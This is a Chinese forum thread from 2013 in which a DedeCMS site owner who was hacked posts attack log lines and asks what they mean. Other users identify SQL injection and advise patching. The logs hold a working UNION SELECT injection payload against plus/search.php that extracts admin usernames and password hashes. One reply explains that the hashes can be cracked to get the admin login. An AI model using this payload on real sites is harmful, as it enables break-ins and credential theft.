[技术交流] 求解：dede网站被黑 [复制链接]
查看:8128 | 回复:16

cnjiao · 发表于 2013-7-15 07:01:51

dede cms网站被黑，data里面有这样的txt，想知道这个txt里面的执行语句是什么意思？另外我网站什么地方不安全（漏洞）

dede cms网站1：

117.95.116.207||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||SelectBreak

dede cms网站2：
58.22.135.103||/plus/search.php?keyword=aa&typeArr%5B111%3D@%60%5C'%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60%5C'%60+%5D=a||SELECT tp.*,ch.typename as ctypename,ch.addtable,ch.issystem FROM `dede_arctype` tp left join `dede_channeltype` ch on ch.id=tp.channeltype WHERE tp.id='111=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `dede_admin`#@`\'` ' LIMIT 0,1;||SelectBreak

zgqc · 发表于 2013-7-15 13:37:46

sql注入吧，dede有补丁就打一下

恋飞的鸵鸟 · 发表于 2013-7-16 14:39:57

cnjiao 发表于 2013-7-16 13:30
前面的ip怎么解释呢？是什么意思

那段txt是楼主导出的日志，某IP在某时间访问的页面

被黑原因：SQL注入

cnjiao · 发表于 2013-7-15 13:34:35

没有了解的吗

如何忘记你 · 发表于 2013-7-15 13:36:02

我不懂技术的啊

我马云 · 发表于 2013-7-15 13:43:45

好复杂的SQL语句

cnjiao · 发表于 2013-7-16 13:30:04

前面的ip怎么解释呢？是什么意思

bestmoban · 发表于 2013-7-16 14:31:41

dede自身漏洞多，找我们吧，安全套装，彻底解决。

每天都不开心 · 发表于 2013-7-16 14:47:47

这个是可以弄到后台的MD5加密密码然后去解密出来就是后台的登陆密码，但是这个只是单纯的找到登陆密码，找后台貌似也很难的

bestmoban · 发表于 2013-7-16 14:53:57

光过滤SQL注入没用,Plus/mytag_js.php也存在漏洞。

百独托管7500 紫田网络	超高转化播放器收cps[推荐]	速盾CDN 免实名免备防屏蔽	阿里云爆款特卖9.9元封顶	提升alexa、IP流量7Q5团队
【腾讯云】中小企福利专场	【腾讯云】多款产品1折起	高防随时退换好耶数据	小飞国外网赚带你月入万元	炎黄网络4H4G10M 99每月
香港带宽CN2/美国站群优惠	中客数据中心服务器租用	联盟系统移动广告平台中易	企业专场腾讯云服务器2.5折	九九数据工信部正规资质
腾讯云新用户大礼包代金券	高价收cpa注册量高价展示	【腾讯云】2核2G/9.93起	租服务器找45互联随时退换	阿里云短信服务验证秒达

[技术交流] 求解：dede网站被黑 [复制链接]
查看:8128 | 回复:16

落伍草根英雄

QQ绑定

落伍者

落伍手机绑定

[技术交流] 求解：dede网站被黑 [复制链接] 查看:8128 | 回复:16

落伍草根英雄

QQ绑定

落伍者

落伍手机绑定

[技术交流] 求解：dede网站被黑 [复制链接]
查看:8128 | 回复:16